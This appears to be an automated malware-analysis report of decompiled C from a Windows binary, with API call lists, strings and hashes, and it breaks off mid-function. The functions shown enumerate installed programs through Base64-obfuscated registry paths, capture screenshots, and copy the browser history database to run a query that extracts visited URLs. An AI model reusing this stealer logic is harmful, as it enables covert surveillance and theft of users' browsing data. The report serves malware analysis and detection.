                            • String ID: Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90$UHJvY2VzczMyRmlyc3RX$UHJvY2VzczMyTmV4dFc=$a2VybmVsMzIuZGxs$kernel32.dll
                            • API String ID: 3877065590-4127804628
                            • Opcode ID: 124315a2081c9e693a39e6801378e39db6c34271a097c37f19d89fdc8cac53d3
                            • Instruction ID: 948cc98421d4847538e10b66e82c05f92fa6bf3d8733b6e628a134da397cb227
                            • Opcode Fuzzy Hash: 124315a2081c9e693a39e6801378e39db6c34271a097c37f19d89fdc8cac53d3
                            • Instruction Fuzzy Hash: 8281A6709001199BCB10EF99C985ADEB7B9FF84304F1181BAE508B7291D739DF858F98
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 51%
                            			E0041564C(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
                            				void* _v8;
                            				char _v1009;
                            				char _v1016;
                            				intOrPtr _v1020;
                            				char _v1024;
                            				char _v1028;
                            				char _v1032;
                            				char _v1036;
                            				char _v1040;
                            				char _v1044;
                            				char _v1048;
                            				char _v1052;
                            				char _v1056;
                            				char _v1060;
                            				char _v1064;
                            				char _v1068;
                            				char _v1072;
                            				char _v1076;
                            				intOrPtr _v1080;
                            				char _v1084;
                            				char _v1088;
                            				char _v1092;
                            				char _v1096;
                            				char _v1100;
                            				char _v1104;
                            				char _v1108;
                            				char _v1112;
                            				char _v1116;
                            				char _v1120;
                            				char _v1124;
                            				char _v1128;
                            				char _v1132;
                            				char _v1136;
                            				char _v1140;
                            				char _v1144;
                            				char _v1148;
                            				void* _t123;
                            				void* _t144;
                            				void* _t178;
                            				void* _t199;
                            				intOrPtr* _t262;
                            				void* _t263;
                            				void* _t265;
                            				void* _t267;
                            				void* _t269;
                            				void* _t271;
                            				intOrPtr _t318;
                            				char* _t329;
                            				int _t331;
                            				int _t332;
                            				intOrPtr _t334;
                            				intOrPtr _t335;
                            
                            				_t334 = _t335;
                            				_t263 = 0x8f;
                            				do {
                            					_push(0);
                            					_push(0);
                            					_t263 = _t263 - 1;
                            				} while (_t263 != 0);
                            				_t262 = __eax;
                            				_t329 =  &_v1009;
                            				_push(_t334);
                            				_push(0x415b6e);
                            				_push( *[fs:eax]);
                            				 *[fs:eax] = _t335;
                            				E004034E4(__eax);
                            				_t331 = 0;
                            				E004069A8("U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxs", _t262,  &_v1016, _t329, 0);
                            				RegOpenKeyExA(0x80000002, E00403990(_v1016), 0, 0x20019,  &_v8);
                            				while(RegEnumKeyA(_v8, _t331, _t329, 0x3e9) == 0) {
                            					E00403D88( &_v1024,  *_t262);
                            					_push(_v1024);
                            					_push(0);
                            					_push( &_v1028);
                            					E004069A8("RGlzcGxheU5hbWU=", _t262,  &_v1036, _t329, _t331);
                            					E00403CF4( &_v1032, E00403990(_v1036));
                            					_push(_v1032);
                            					E004069A8("U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxsXA==", _t262,  &_v1044, _t329, _t331);
                            					_push( &_v1044);
                            					E00403748( &_v1048, 0x3e9, _t329);
                            					_pop(_t123);
                            					E00403798(_t123, _v1048);
                            					E00403CF4( &_v1040, E00403990(_v1044));
                            					_pop(_t265);
                            					E004075C0(0x80000002, _t262, _t265, _v1040);
                            					_push(_v1028);
                            					_push(0x415c44);
                            					_push(0);
                            					_push( &_v1052);
                            					E004069A8("RGlzcGxheVZlcnNpb24=", _t262,  &_v1060, _t329, _t331);
                            					E00403CF4( &_v1056, E00403990(_v1060));
                            					_push(_v1056);
                            					E004069A8("U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxsXA==", _t262,  &_v1068, _t329, _t331);
                            					_push( &_v1068);
                            					E00403748( &_v1072, 0x3e9, _t329);
                            					_pop(_t144);
                            					E00403798(_t144, _v1072);
                            					E00403CF4( &_v1064, E00403990(_v1068));
                            					_pop(_t267);
                            					E004075C0(0x80000002, _t262, _t267, _v1064);
                            					_push(_v1052);
                            					_push(")");
                            					E00403E78();
                            					E0040377C(_t262, _v1020);
                            					_t331 = _t331 + 1;
                            				}
                            				_t332 = 0;
                            				E004069A8("U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxs", _t262,  &_v1076, _t329, 0);
                            				RegOpenKeyExA(0x80000001, E00403990(_v1076), 0, 0x20019,  &_v8);
                            				while(RegEnumKeyA(_v8, _t332, _t329, 0x3e9) == 0) {
                            					E00403D88( &_v1084,  *_t262);
                            					_push(_v1084);
                            					_push(0);
                            					_push( &_v1088);
                            					E004069A8("RGlzcGxheU5hbWU=", _t262,  &_v1096, _t329, _t332);
                            					E00403CF4( &_v1092, E00403990(_v1096));
                            					_push(_v1092);
                            					E004069A8("U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxsXA==", _t262,  &_v1104, _t329, _t332);
                            					_push( &_v1104);
                            					E00403748( &_v1108, 0x3e9, _t329);
                            					_pop(_t178);
                            					E00403798(_t178, _v1108);
                            					E00403CF4( &_v1100, E00403990(_v1104));
                            					_pop(_t269);
                            					E004075C0(0x80000001, _t262, _t269, _v1100);
                            					_push(_v1088);
                            					_push(0x415c44);
                            					_push(0);
                            					_push( &_v1112);
                            					E004069A8("RGlzcGxheVZlcnNpb24=", _t262,  &_v1120, _t329, _t332);
                            					E00403CF4( &_v1116, E00403990(_v1120));
                            					_push(_v1116);
                            					E004069A8("U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxsXA==", _t262,  &_v1128, _t329, _t332);
                            					_push( &_v1128);
                            					E00403748( &_v1132, 0x3e9, _t329);
                            					_pop(_t199);
                            					E00403798(_t199, _v1132);
                            					E00403CF4( &_v1124, E00403990(_v1128));
                            					_pop(_t271);
                            					E004075C0(0x80000001, _t262, _t271, _v1124);
                            					_push(_v1112);
                            					_push(")");
                            					E00403E78();
                            					E0040377C(_t262, _v1080);
                            					_t332 = _t332 + 1;
                            				}
                            				E00403D88( &_v1140,  *_t262);
                            				E0040717C(_v1140, _t262, 0x415c78, L"()\r\n",  &_v1136);
                            				E0040377C(_t262, _v1136);
                            				E00403D88( &_v1148,  *_t262);
                            				E0040717C(_v1148, _t262, 0x415c78, L"\r\n\r\n",  &_v1144);
                            				E0040377C(_t262, _v1144);
                            				_pop(_t318);
                            				 *[fs:eax] = _t318;
                            				_push(E00415B78);
                            				E00403BF4( &_v1148, 4);
                            				E00403508( &_v1132, 2);
                            				E00403BDC( &_v1124);
                            				E004034E4( &_v1120);
                            				E00403BF4( &_v1116, 2);
                            				E00403508( &_v1108, 2);
                            				E00403BDC( &_v1100);
                            				E004034E4( &_v1096);
                            				E00403BF4( &_v1092, 4);
                            				E00403508( &_v1076, 3);
                            				E00403BDC( &_v1064);
                            				E004034E4( &_v1060);
                            				E00403BF4( &_v1056, 2);
                            				E00403508( &_v1048, 2);
                            				E00403BDC( &_v1040);
                            				E004034E4( &_v1036);
                            				E00403BF4( &_v1032, 4);
                            				return E004034E4( &_v1016);
                            			}

                            APIs
                            • RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,00020019,0041A212,00000000,00415B6E,?,-00000001,?,?,00000000,00000000,?,00416BF5,00000001), ref: 004156A9
                            • RegEnumKeyA.ADVAPI32(0041A212,00000000,?,000003E9), ref: 00415831
                            • RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,0041A212,0041A212,00000001,?,000003E9,),?,?,00000000,00415C44,?,?), ref: 0041586C
                            • RegEnumKeyA.ADVAPI32(0041A212,00000000,?,000003E9), ref: 004159F4
                              • Part of subcall function 00403BDC: SysFreeString.OLEAUT32(00000000), ref: 00403BEA
                              • Part of subcall function 00403BF4: SysFreeString.OLEAUT32(?), ref: 00403C07
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: EnumFreeOpenString
                            • String ID: $()$)$RGlzcGxheU5hbWU=$RGlzcGxheVZlcnNpb24=$U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxs$U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxsXA==
                            • API String ID: 373517563-3013244427
                            • Opcode ID: 8892950bb751b5d78bd6f273eaab46e4e0552f7128122a2ace435e765f63cac5
                            • Instruction ID: c01df635abeadf6e6837e62572b2515f3de099e5a3d6091bc8c8e2951dea1457
                            • Opcode Fuzzy Hash: 8892950bb751b5d78bd6f273eaab46e4e0552f7128122a2ace435e765f63cac5
                            • Instruction Fuzzy Hash: 94C1F5B5A001189BCB11EB55CC41BCEB7BDAB84305F5045FBB608B7282DA78AF858F5D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00402668(CHAR* __eax, intOrPtr* __edx) {
                            				char _t5;
                            				char _t6;
                            				CHAR* _t7;
                            				char _t9;
                            				CHAR* _t11;
                            				char _t14;
                            				CHAR* _t15;
                            				char _t17;
                            				CHAR* _t19;
                            				CHAR* _t22;
                            				CHAR* _t23;
                            				CHAR* _t32;
                            				intOrPtr _t33;
                            				intOrPtr* _t34;
                            				void* _t35;
                            				void* _t36;
                            
                            				_t34 = __edx;
                            				_t22 = __eax;
                            				while(1) {
                            					L2:
                            					_t5 =  *_t22;
                            					if(_t5 != 0 && _t5 <= 0x20) {
                            						_t22 = CharNextA(_t22);
                            					}
                            					L4:
                            					if( *_t22 != 0x22 || _t22[1] != 0x22) {
                            						_t36 = 0;
                            						_t32 = _t22;
                            						while(1) {
                            							_t6 =  *_t22;
                            							if(_t6 <= 0x20) {
                            								break;
                            							}
                            							if(_t6 != 0x22) {
                            								_t7 = CharNextA(_t22);
                            								_t36 = _t36 + _t7 - _t22;
                            								_t22 = _t7;
                            								continue;
                            							}
                            							_t22 = CharNextA(_t22);
                            							while(1) {
                            								_t9 =  *_t22;
                            								if(_t9 == 0 || _t9 == 0x22) {
                            									break;
                            								}
                            								_t11 = CharNextA(_t22);
                            								_t36 = _t36 + _t11 - _t22;
                            								_t22 = _t11;
                            							}
                            							if( *_t22 != 0) {
                            								_t22 = CharNextA(_t22);
                            							}
                            						}
                            						E00403B1C(_t34, _t36);
                            						_t23 = _t32;
                            						_t33 =  *_t34;
                            						_t35 = 0;
                            						while(1) {
                            							_t14 =  *_t23;
                            							if(_t14 <= 0x20) {
                            								break;
                            							}
                            							if(_t14 != 0x22) {
                            								_t15 = CharNextA(_t23);
                            								if(_t15 <= _t23) {
                            									continue;
                            								} else {
                            									goto L27;
                            								}
                            								do {
                            									L27:
                            									 *((char*)(_t33 + _t35)) =  *_t23;
                            									_t23 =  &(_t23[1]);
                            									_t35 = _t35 + 1;
                            								} while (_t15 > _t23);
                            								continue;
                            							}
                            							_t23 = CharNextA(_t23);
                            							while(1) {
                            								_t17 =  *_t23;
                            								if(_t17 == 0 || _t17 == 0x22) {
                            									break;
                            								}
                            								_t19 = CharNextA(_t23);
                            								if(_t19 <= _t23) {
                            									continue;
                            								} else {
                            									goto L21;
                            								}
                            								do {
                            									L21:
                            									 *((char*)(_t33 + _t35)) =  *_t23;
                            									_t23 =  &(_t23[1]);
                            									_t35 = _t35 + 1;
                            								} while (_t19 > _t23);
                            							}
                            							if( *_t23 != 0) {
                            								_t23 = CharNextA(_t23);
                            							}
                            						}
                            						return _t23;
                            					} else {
                            						_t22 =  &(_t22[2]);
                            						continue;
                            					}
                            				}
                            			}

                            APIs
                            • CharNextA.USER32(00000000,?,00000000,00000000,?,0040279A,-00000001,?,?,004195AF,?), ref: 0040269F
                            • CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,?,?,004195AF,?), ref: 004026A9
                            • CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,?,?,004195AF,?), ref: 004026C6
                            • CharNextA.USER32(00000000,?,00000000,00000000,?,0040279A,-00000001,?,?,004195AF,?), ref: 004026D0
                            • CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,?,?,004195AF,?), ref: 004026F9
                            • CharNextA.USER32(00000000,00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,?,?,004195AF,?), ref: 00402703
                            • CharNextA.USER32(00000000,00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,?,?,004195AF,?), ref: 00402727
                            • CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,?,?,004195AF,?), ref: 00402731
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: CharNext
                            • String ID: "$"
                            • API String ID: 3213498283-3758156766
                            • Opcode ID: c6d8730434dbc330e26cf7f014052777a241139f1a82d49c5bcfa5fb36d78824
                            • Instruction ID: 06a23872e8460c007548b42de0442a537cd71877075bfb16317ebbd4e879d901
                            • Opcode Fuzzy Hash: c6d8730434dbc330e26cf7f014052777a241139f1a82d49c5bcfa5fb36d78824
                            • Instruction Fuzzy Hash: 2D21E7546043D51ADB31297A0AC877A7B894A5B304B68087BD0C1BB3D7D4FE4C8B832D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 30%
                            			E00416FB0(int __eax, void* __ebx, int __ecx, int __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, char _a12, int _a16) {
                            				int _v8;
                            				int _v12;
                            				int _v16;
                            				char _v20;
                            				char _v24;
                            				char _v28;
                            				void* _v32;
                            				struct HWND__* _v48;
                            				struct HWND__* _v52;
                            				struct HWND__* _v56;
                            				char _v60;
                            				intOrPtr _v124;
                            				char _v132;
                            				char _v148;
                            				char* _v152;
                            				intOrPtr _v156;
                            				intOrPtr _v160;
                            				void* _v176;
                            				char _v180;
                            				intOrPtr* _t78;
                            				struct HDC__* _t100;
                            				intOrPtr _t107;
                            				void* _t112;
                            				void* _t114;
                            				struct HDC__* _t116;
                            				struct HDC__* _t118;
                            				void* _t121;
                            
                            				_v28 = 0;
                            				_v16 = __ecx;
                            				_v12 = __edx;
                            				_v8 = __eax;
                            				_push(_t121);
                            				_push(0x4171d7);
                            				_push( *[fs:eax]);
                            				 *[fs:eax] = _t121 + 0xffffff50;
                            				if( *0x41cb04 != 0 &&  *0x41cb08 != 0 &&  *0x41cb0c != 0 &&  *0x41cb10 != 0 &&  *0x41cb14 != 0 &&  *0x41cb18 != 0 &&  *0x41cb1c != 0 &&  *0x41cb20 != 0 &&  *0x41cb24 != 0 &&  *0x41cb28 != 0) {
                            					_v60 = 1;
                            					_v56 = 0;
                            					_v52 = 0;
                            					_v48 = 0;
                            					_push(0);
                            					_push( &_v60);
                            					_push( &_v20);
                            					if( *0x41cb08() == 0) {
                            						_t100 = GetDC(0);
                            						_t116 = CreateCompatibleDC(0);
                            						_t112 = CreateCompatibleBitmap(_t100, _v8, _v12);
                            						SelectObject(_t116, _t112);
                            						BitBlt(_t116, 0, 0, _v8, _v12, _t100, _v16, _a16, 0xcc0020);
                            						 *0x41cb24(0, 0xffffffff, E0040495C( &_v28));
                            						 *0x41cb10(_t112, 0,  &_v24);
                            						E00416EDC(_a8, _t100,  &_v148, _t112, _t116);
                            						_v180 = 1;
                            						asm("movsd");
                            						asm("movsd");
                            						asm("movsd");
                            						asm("movsd");
                            						_t114 = _t112;
                            						_t118 = _t116;
                            						_v160 = 1;
                            						_v156 = 4;
                            						_v152 =  &_a12;
                            						 *0x41cb20(_v24, _v28,  &_v148,  &_v180);
                            						_t78 = _v28;
                            						 *((intOrPtr*)( *_t78 + 0x30))(_t78,  &_v132, 1);
                            						 *0x41cb28(_v28,  &_v32);
                            						GlobalFix(_v32);
                            						E004035D4(_a4, _v124, _v32);
                            						 *0x41cb1c(_v24);
                            						GlobalUnWire(_v32);
                            						DeleteObject(_t114);
                            						DeleteDC(_t118);
                            						ReleaseDC(0, _t100);
                            						 *0x41cb0c(_v20);
                            					}
                            				}
                            				_pop(_t107);
                            				 *[fs:eax] = _t107;
                            				_push(E004171DE);
                            				return E0040495C( &_v28);
                            			}

                            0x00416fbe
                            0x00416fc1
                            0x00416fc4
                            0x00416fc7
                            0x00416fcc
                            0x00416fcd
                            0x00416fd2
                            0x00416fd5
                            0x00416fdf
                            0x0041705a
                            0x00417061
                            0x00417068
                            0x0041706f
                            0x00417076
                            0x0041707b
                            0x0041707f
                            0x00417088
                            0x00417095
                            0x0041709e
                            0x004170ae
                            0x004170b2
                            0x004170d2
                            0x004170e4
                            0x004170f1
                            0x00417100
                            0x00417105
                            0x0041711c
                            0x0041711d
                            0x0041711e
                            0x0041711f
                            0x00417120
                            0x00417121
                            0x00417122
                            0x0041712c
                            0x00417139
                            0x00417155
                            0x00417161
                            0x00417167
                            0x00417172
                            0x0041717c
                            0x0041718b
                            0x00417194
                            0x0041719e
                            0x004171a4
                            0x004171aa
                            0x004171b2
                            0x004171bb
                            0x004171bb
                            0x00417088
                            0x004171c3
                            0x004171c6
                            0x004171c9
                            0x004171d6

                            APIs
                            • GetDC.USER32(00000000), ref: 00417090
                            • CreateCompatibleDC.GDI32(00000000), ref: 00417099
                            • CreateCompatibleBitmap.GDI32(00000000,0041A212,?), ref: 004170A9
                            • SelectObject.GDI32(00000000,00000000), ref: 004170B2
                            • BitBlt.GDI32(00000000,00000000,00000000,0041A212,?,00000000,00000000,?,00CC0020), ref: 004170D2
                            • GlobalFix.KERNEL32(?), ref: 0041717C
                            • GlobalUnWire.KERNEL32(?), ref: 0041719E
                            • DeleteObject.GDI32(00000000), ref: 004171A4
                            • DeleteDC.GDI32(00000000), ref: 004171AA
                            • ReleaseDC.USER32 ref: 004171B2
                            Memory Dump Source
                            • Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: CompatibleCreateDeleteGlobalObject$BitmapReleaseSelectWire
                            • String ID:
                            • API String ID: 914135935-0
                            • Opcode ID: 75d1131f51ecb2d553ab7d8928f99ad89ba4083edd43a8eb5aad49789378265a
                            • Instruction ID: ef45df128ede85129e0c4d5475d485c7d6030f40d18b36e8376d67ec69c327ad
                            • Opcode Fuzzy Hash: 75d1131f51ecb2d553ab7d8928f99ad89ba4083edd43a8eb5aad49789378265a
                            • Instruction Fuzzy Hash: BE51FDB1A44209AFDB11DF95EC85FEF7BBCAB48305F104066F604E62D1C7786984CB69
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 49%
                            			E00412974(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                            				char _v8;
                            				intOrPtr _v12;
                            				char _v16;
                            				char _v20;
                            				char _v24;
                            				char _v28;
                            				char _v32;
                            				char _v36;
                            				char _v40;
                            				char _v44;
                            				char _v48;
                            				char _v52;
                            				char _v56;
                            				char _v60;
                            				char _v64;
                            				intOrPtr _v68;
                            				char _v72;
                            				char _v76;
                            				char _v80;
                            				char _v84;
                            				char _v88;
                            				char _v92;
                            				long _t73;
                            				WCHAR* _t86;
                            				intOrPtr* _t101;
                            				void* _t103;
                            				intOrPtr* _t105;
                            				intOrPtr* _t109;
                            				intOrPtr* _t138;
                            				void* _t140;
                            				intOrPtr* _t142;
                            				void* _t144;
                            				intOrPtr* _t152;
                            				intOrPtr* _t158;
                            				intOrPtr* _t164;
                            				void* _t166;
                            				void* _t178;
                            				intOrPtr _t198;
                            				intOrPtr _t200;
                            				intOrPtr _t213;
                            				intOrPtr _t217;
                            				intOrPtr _t218;
                            				void* _t219;
                            				void* _t220;
                            
                            				_t215 = __esi;
                            				_t177 = __ebx;
                            				_t217 = _t218;
                            				_t178 = 0xb;
                            				do {
                            					_push(0);
                            					_push(0);
                            					_t178 = _t178 - 1;
                            					_t223 = _t178;
                            				} while (_t178 != 0);
                            				_push(__ebx);
                            				_push(__esi);
                            				_push(__edi);
                            				_v12 = __edx;
                            				_v8 = __eax;
                            				_t3 =  &_v8; // 0x6f747365
                            				E00404150(_t3);
                            				_push(_t217);
                            				_push(0x412c41);
                            				_push( *[fs:eax]);
                            				 *[fs:eax] = _t218;
                            				_t4 =  &_v28; // 0x6f747351
                            				E00403BDC(_t4);
                            				_push(_t217);
                            				_push(0x412bb7);
                            				_push( *[fs:eax]);
                            				 *[fs:eax] = _t218;
                            				_t73 = GetTickCount();
                            				_t5 =  &_v60; // 0x6f747331
                            				E0040709C(_t73, __ebx, _t5, __esi, _t223);
                            				_push(_v60);
                            				_t7 =  &_v64; // 0x6f74732d
                            				E00406FDC(_t7, __ebx, __edi, __esi, _t223);
                            				_push(_v64);
                            				_push(L".tmp");
                            				E00403E78();
                            				_t10 =  &_v40; // 0x6f747345
                            				E004078D8(_v8, _t177, _t10, _t223);
                            				_t12 =  &_v72; // 0x6f747325
                            				E004062FC(L"%TEMP%", _t12, _t223);
                            				_push(_v72);
                            				_push(0x412c78);
                            				_push(_v32);
                            				E00403E78();
                            				_t17 =  &_v44; // 0x6f747341
                            				E004078D8(_v68, _t177, _t17, _t223);
                            				_t86 = E00403D98(_v44);
                            				CopyFileW(E00403D98(_v40), _t86, 0xffffffff);
                            				_t20 =  &_v76; // 0x6f747321
                            				E0040377C(_t20, _v44);
                            				_t23 =  &_v36; // 0x6f747349
                            				E00404B58(_v76, _t177, _t178, _t23, _t215, _t223);
                            				_t24 =  &_v80; // 0x6f74731d
                            				E00403D88(_t24, _v36);
                            				if(E0040776C(_v80, _t177, _t178) != 0) {
                            					_t101 =  *0x41b140; // 0x41ca20
                            					_t103 =  *((intOrPtr*)( *_t101))(E00403990(_v36),  &_v16);
                            					_t219 = _t218 + 8;
                            					__eflags = _t103;
                            					if(_t103 == 0) {
                            						_t138 =  *0x41b2d4; // 0x41ca28
                            						_t140 =  *((intOrPtr*)( *_t138))(_v16, "SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),\"unixepoch\") , urls.title , urls.url FROM urls, visits WHERE urls.id = visits.url ORDER By  visits.visit_time DESC LIMIT 0, 10000", 0xffffffff,  &_v20,  &_v24);
                            						_t220 = _t219 + 0x14;
                            						__eflags = _t140;
                            						if(_t140 == 0) {
                            							while(1) {
                            								_t142 =  *0x41b384; // 0x41ca2c
                            								_t144 =  *((intOrPtr*)( *_t142))(_v20);
                            								__eflags = _t144 - 0x64;
                            								if(_t144 != 0x64) {
                            									goto L9;
                            								}
                            								E004034E4( &_v48);
                            								E004034E4( &_v52);
                            								E004034E4( &_v56);
                            								_t152 =  *0x41b1dc; // 0x41ca30
                            								E004036DC( &_v48,  *((intOrPtr*)( *_t152))(_v20, 0));
                            								_t158 =  *0x41b1dc; // 0x41ca30
                            								E004036DC( &_v52,  *((intOrPtr*)( *_t158))(_v20, 1));
                            								_t164 =  *0x41b1dc; // 0x41ca30
                            								_t166 =  *((intOrPtr*)( *_t164))(_v20, 2);
                            								_t220 = _t220 + 0x18;
                            								E004036DC( &_v56, _t166);
                            								_push(_v28);
                            								_push(0x412d40);
                            								E00403D88( &_v84, _v48);
                            								_push(_v84);
                            								_push(0x412d48);
                            								E00403D88( &_v88, _v52);
                            								_push(_v88);
                            								_push(0x412d54);
                            								E00403D88( &_v92, _v56);
                            								_push(_v92);
                            								_push(L"\r\n\r\n");
                            								E00403E78();
                            							}
                            						}
                            					}
                            					L9:
                            					_t105 =  *0x41b46c; // 0x41ca38
                            					 *((intOrPtr*)( *_t105))(_v20);
                            					_t109 =  *0x41b20c; // 0x41ca24
                            					 *((intOrPtr*)( *_t109))(_v16);
                            					_pop(_t198);
                            					 *[fs:eax] = _t198;
                            					E00403C18(_v12, _v28);
                            					DeleteFileW(E00403D98(_v44));
                            				} else {
                            					_pop(_t213);
                            					 *[fs:eax] = _t213;
                            				}
                            				_pop(_t200);
                            				 *[fs:eax] = _t200;
                            				_push(E00412C48);
                            				_t58 =  &_v92; // 0x6f747311
                            				E00403BF4(_t58, 4);
                            				_t59 =  &_v76; // 0x6f747321
                            				E004034E4(_t59);
                            				_t60 =  &_v72; // 0x6f747325
                            				E00403BF4(_t60, 4);
                            				_t61 =  &_v56; // 0x6f747335
                            				E00403508(_t61, 3);
                            				_t62 =  &_v44; // 0x6f747341
                            				E00403BF4(_t62, 2);
                            				_t63 =  &_v36; // 0x6f747349
                            				E004034E4(_t63);
                            				_t64 =  &_v32; // 0x6f74734d
                            				E00403BF4(_t64, 2);
                            				_t65 =  &_v8; // 0x6f747365
                            				return E00403BDC(_t65);
                            			}

                            0x00412974
                            0x00412974
                            0x00412975
                            0x00412977
                            0x0041297c
                            0x0041297c
                            0x0041297e
                            0x00412980
                            0x00412980
                            0x00412980
                            0x00412983
                            0x00412984
                            0x00412985
                            0x00412986
                            0x00412989
                            0x0041298c
                            0x0041298f
                            0x00412996
                            0x00412997
                            0x0041299c
                            0x0041299f
                            0x004129a2
                            0x004129a5
                            0x004129ac
                            0x004129ad
                            0x004129b2
                            0x004129b5
                            0x004129b8
                            0x004129bd
                            0x004129c0
                            0x004129c5
                            0x004129c8
                            0x004129cb
                            0x004129d0
                            0x004129d3
                            0x004129e0
                            0x004129e5
                            0x004129eb
                            0x004129f0
                            0x004129f8
                            0x004129fd
                            0x00412a00
                            0x00412a05
                            0x00412a10
                            0x00412a18
                            0x00412a1b
                            0x00412a25
                            0x00412a34
                            0x00412a39
                            0x00412a3f
                            0x00412a47
                            0x00412a4a
                            0x00412a4f
                            0x00412a55
                            0x00412a64
                            0x00412a80
                            0x00412a87
                            0x00412a89
                            0x00412a8c
                            0x00412a8e
                            0x00412aa7
                            0x00412aae
                            0x00412ab0
                            0x00412ab3
                            0x00412ab5
                            0x00412b7a
                            0x00412b7e
                            0x00412b85
                            0x00412b88
                            0x00412b8b
                            0x00000000
                            0x00000000
                            0x00412ac3
                            0x00412acb
                            0x00412ad3
                            0x00412ade
                            0x00412aef
                            0x00412afa
                            0x00412b0b
                            0x00412b16
                            0x00412b1d
                            0x00412b1f
                            0x00412b27
                            0x00412b2c
                            0x00412b2f
                            0x00412b3a
                            0x00412b3f
                            0x00412b42
                            0x00412b4d
                            0x00412b52
                            0x00412b55
                            0x00412b60
                            0x00412b65
                            0x00412b68
                            0x00412b75
                            0x00412b75
                            0x00412b7a
                            0x00412ab5
                            0x00412b91
                            0x00412b95
                            0x00412b9c
                            0x00412ba3
                            0x00412baa
                            0x00412baf
                            0x00412bb2
                            0x00412bc7
                            0x00412bd5
                            0x00412a66
                            0x00412a68
                            0x00412a6b
                            0x00412a6b
                            0x00412bdc
                            0x00412bdf
                            0x00412be2
                            0x00412be7
                            0x00412bef
                            0x00412bf4
                            0x00412bf7
                            0x00412bfc
                            0x00412c04
                            0x00412c09
                            0x00412c11
                            0x00412c16
                            0x00412c1e
                            0x00412c23
                            0x00412c26
                            0x00412c2b
                            0x00412c33
                            0x00412c38
                            0x00412c40

                            APIs
                            • GetTickCount.KERNEL32 ref: 004129B8
                            • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00412C78,?,.tmp,?,?,00000000,00412BB7,?,00000000,00412C41,?,00000000), ref: 00412A34
                            • DeleteFileW.KERNEL32(00000000), ref: 00412BD5
                            Strings
                            • SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch") , urls.title , urls.url FROM urls, visits WHERE urls.id = visits.url ORDER By visits.visit_time DESC LIMIT 0, 10000, xrefs: 00412A9E
                            • .tmp, xrefs: 004129D3
                            • %TEMP%, xrefs: 004129F3
                            • , xrefs: 00412B68
                            Memory Dump Source
                            • Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: File$CopyCountDeleteTick
                            • String ID: $%TEMP%$.tmp$SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch") , urls.title , urls.url FROM urls, visits WHERE urls.id = visits.url ORDER By visits.visit_time DESC LIMIT 0, 10000
                            • API String ID: 2381671008-351388873
                            • Opcode ID: 551d3d9a6a1bb4e856a4b43c992a77fd18843ed0a399b7e38e05dabe73914c23
                            • Instruction ID: f70f4eb6c3a4d74226b28448a77a1ad81309a428455034dfd3705b2b32de383d
                            • Opcode Fuzzy Hash: 551d3d9a6a1bb4e856a4b43c992a77fd18843ed0a399b7e38e05dabe73914c23
                            • Instruction Fuzzy Hash: C7810B71A00109AFCB00EF95DD82EDEBBB8EF48305F504476F514F72A1DB78AA558B58
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 43%
                            			E0041253C(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                            				char _v8;
                            				intOrPtr _v12;
                            				char _v16;
                            				char _v20;
                            				char _v24;
                            				char _v28;
                            				char _v32;
                            				char _v36;
                            				char _v40;
                            				char _v44;
                            				char _v48;
                            				char _v52;
                            				char _v56;
                            				char _v60;
                            				char _v64;
                            				intOrPtr _v68;
                            				char _v72;
                            				char _v76;
                            				char _v80;
                            				char _v84;
                            				char _v88;
                            				char _v92;
                            				WCHAR* _t86;
                            				intOrPtr* _t101;
                            				void* _t103;
                            				intOrPtr* _t105;
                            				intOrPtr* _t109;
                            				intOrPtr* _t138;
                            				void* _t140;
                            				intOrPtr* _t142;
                            				void* _t144;
                            				intOrPtr* _t152;
                            				intOrPtr* _t158;
